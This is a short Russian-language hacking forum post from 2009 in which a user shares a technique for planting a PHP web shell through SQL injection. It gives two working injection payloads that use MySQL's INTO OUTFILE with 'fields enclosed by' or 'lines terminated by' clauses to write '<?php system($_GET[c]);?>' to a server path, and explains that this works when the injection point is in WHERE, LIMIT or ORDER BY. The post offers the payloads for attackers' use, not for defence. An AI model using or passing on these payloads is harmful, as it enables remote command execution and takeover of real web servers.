02.06.2009, 01:07
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780
Репутация:
585
|
|
[ + еще одна небольшая "фича" по теме залития шелла через SQL Injection ]
Не уверен, что тут уже не писали о подобном способе аплоада шелла, но вроде пока не находил. Возможно, пригодится кому-то:
Код:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+enclosed+by+"<?php+system($_GET[c]);die();?>"--+
Т.е. если инъекция в аргументе WHERE (или в LIMIT'е, или в ORDER BY, etc) SELECT-запроса, то можно сразу сделать вывод в файл без UNION'а или подзапросов. Зачем там die() сами догадайтесь. (;
add: Ну или даже удобнее так:
Код:
id=1+limit+1+into+outfile+'/path/to/shell.php'+lines+terminated+by+"<?php+system($_GET[c]);?>"--+
Вобщем, тут возможны вариации.
Последний раз редактировалось cr0w; 07.06.2009 в 01:50..
|
|
|